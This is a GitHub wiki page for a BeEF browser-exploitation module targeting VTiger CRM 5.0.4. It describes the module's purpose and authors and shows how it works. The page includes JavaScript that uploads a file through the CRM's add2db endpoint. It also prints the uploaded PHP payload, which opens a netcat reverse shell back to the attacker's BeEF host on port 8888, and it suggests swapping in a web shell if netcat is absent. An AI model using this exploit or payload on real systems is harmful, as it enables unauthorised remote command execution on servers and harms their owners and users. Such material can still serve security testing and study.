Module: VTiger CRM Upload Exploit - h4sh5/beef GitHub Wiki

Summary

  • Objective: Exploits VTiger CRM 5.0.4 and uploads a reverse shell

  • Authors: wade, bm, pipes, xntrik, yorikv

  • Browsers: All

  • Code

Internal Working

Uploads a reverse shell PHP file via XMLHttpRequest.

var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';

//..

http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
//...

The PHP uploaded and executed:

<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>

If /bin/nc is not installed on the target machine, this will not work. For a start you can try to upload a web shell instead of a reverse shell. The PHP code can be changed in <beef_path>/modules/exploits/vtiger_crm_upload_exploit/module.rb

Feedback

User Guide

I. Introduction   |   II. Basic Utilization   |   III. Advanced Utilization   |   IV. Development   |   V. References

Community

Blog   |   Code   |   Youtube   |   Twitter

⚠️ **GitHub.com Fallback** ⚠️